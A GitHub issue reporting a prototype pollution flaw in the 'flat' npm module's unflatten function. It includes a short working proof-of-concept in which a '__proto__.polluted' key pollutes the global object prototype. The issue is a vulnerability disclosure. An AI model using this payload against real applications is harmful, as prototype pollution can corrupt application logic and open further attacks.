-
Notifications
You must be signed in to change notification settings - Fork 200
Closed
Description
This module has prototype pollution vulnerablity
and it can make logic vulnerability in application use this
var unflatten = require('flat').unflatten;
unflatten({
'__proto__.polluted': true
});
console.log(polluted); // true
timoxley, MatthiasKunnen, JoaoVitorMaia, msrkp, Xvezda and 3 more
Metadata
Metadata
Assignees
Labels
No labels